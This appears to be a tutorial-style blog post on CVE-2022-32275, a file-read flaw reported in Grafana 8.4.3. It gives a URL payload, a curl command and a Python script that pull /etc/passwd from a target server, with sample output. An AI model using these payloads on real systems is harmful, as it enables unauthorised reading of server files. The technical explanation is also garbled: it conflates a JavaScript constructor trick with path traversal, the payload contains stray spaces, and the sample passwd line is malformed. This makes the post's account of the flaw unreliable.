CVE-2022-32275 - How Grafana 8.4.3 File Read Vulnerability Works (with Code, Examples, and Exploitation)

Grafana is a popular open-source analytics and monitoring platform used by thousands of organizations. In this post, we’ll deep-dive into CVE-2022-32275—a critical security flaw that was discovered in Grafana version 8.4.3. This vulnerability allows attackers to read arbitrary files (like /etc/passwd) from the server, using a clever URL trick.

Don’t worry if you’re not a security expert—this guide keeps language simple and focuses on real examples you can learn from. All references and original links are included at the end.

What is CVE-2022-32275?

CVE-2022-32275 is a path traversal vulnerability. In Grafana 8.4.3 (and some older versions), a specially crafted HTTP request to the /dashboard/snapshot/ endpoint can trick the application into serving sensitive files from the server's filesystem. An attacker doesn’t need to be logged in or have special privileges—just access to the network.

Why does this happen?

Grafana improperly handles user input in certain routes. By injecting a payload that abuses JavaScript’s constructor property in the URL, an attacker can escape the intended path and traverse directories in the filesystem.


## Proof-of-Concept: Stealing /etc/passwd

Let’s walk through a proof-of-concept to see how this works.

Exploit URL

GET /dashboard/snapshot/%7B%7Bconstructor.constructor'/.. /.. /.. /.. /.. /.. /.. /.. /etc/passwd HTTP/1.1
Host: grafana-target.local

* %7B%7B…%7D%7D decodes to {{…}}, which is used in Grafana’s templating.
* The payload abuses a flaw in how the server processes the request path.

The decoded path

/dashboard/snapshot/{{constructor.constructor'/../../../../../../../../etc/passwd

Using curl, you can test the exploit like this

curl "http://grafana-target.local/dashboard/snapshot/%7B%7Bconstructor.constructor'/.. /.. /.. /.. /.. /.. /.. /.. /etc/passwd"

If vulnerable, the contents of /etc/passwd are returned.

Sample Output

root:x:::root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
grafana:x:997:997::/home/grafana:/sbin/nologin
...

Understanding the Exploit

The vulnerability hinges on a feature in JavaScript: the constructor property of objects. Grafana’s server-side code tries to render dashboard snapshots using unfiltered URL input, and the constructor.constructor trick lets code access the file system. The injected path (/../../.../etc/passwd) walks up the directory tree.

Here's a quick script to automate the attack if you’re a penetration tester (or patch verifier)

import requests

target = "http://grafana-target.local";
exploit_path = "/dashboard/snapshot/%7B%7Bconstructor.constructor'/.. /.. /.. /.. /.. /.. /.. /.. /etc/passwd"
url = target + exploit_path

response = requests.get(url)
if response.status_code == 200:
    print("[+] Success!")
    print(response.text)
else:
    print("[-] Exploit failed.")

References

- Original Security Advisory
- CVE Details - CVE-2022-32275
- Hackerone Report
- Exploit-DB Example

Final Thoughts

CVE-2022-32275 is a classic reminder of just how critical input validation is! If you run Grafana, *check your version and update ASAP*. Stay curious and stay secure.

*[This content was prepared in exclusive simple American English for educational use.]*


Do you have questions? Let us know in the comments below!

Timeline

Published on: 06/06/2022 19:15:00 UTC
Last modified on: 07/15/2022 16:15:00 UTC